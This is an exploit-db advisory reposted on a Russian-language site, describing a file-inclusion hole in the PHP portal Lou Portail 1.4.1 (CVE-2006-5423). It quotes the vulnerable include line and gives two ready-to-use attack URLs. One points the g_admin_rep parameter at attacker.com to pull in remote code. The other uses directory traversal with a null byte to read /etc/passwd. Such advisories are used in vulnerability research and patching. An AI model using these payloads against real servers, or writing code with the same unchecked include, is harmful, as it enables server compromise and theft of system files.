- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2603
- Проверка EDB
-
- Пройдено
- Автор
- MP
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5423
- Дата публикации
- 2006-10-20
Код:
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# #
# [ Lou Portail 1.4.1 ] #
#
# Class: Remote|Local File Include Vulnerability #
# Patch: Unavailable #
# Published 2006/10/18 #
# Remote: Yes
# Local: No #
# Type: High #
# Site: http://louportail.free.fr/ #
# Author: MP
# Contact: [email protected] #
# #
#################################################################
Vuln Code (admin/admin_module.php):
<?...
include ("$g_admin_rep/admin_utils.$g_ext");
...?>
#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt
#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
# milw0rm.com [2006-10-20]- Источник
- www.exploit-db.com
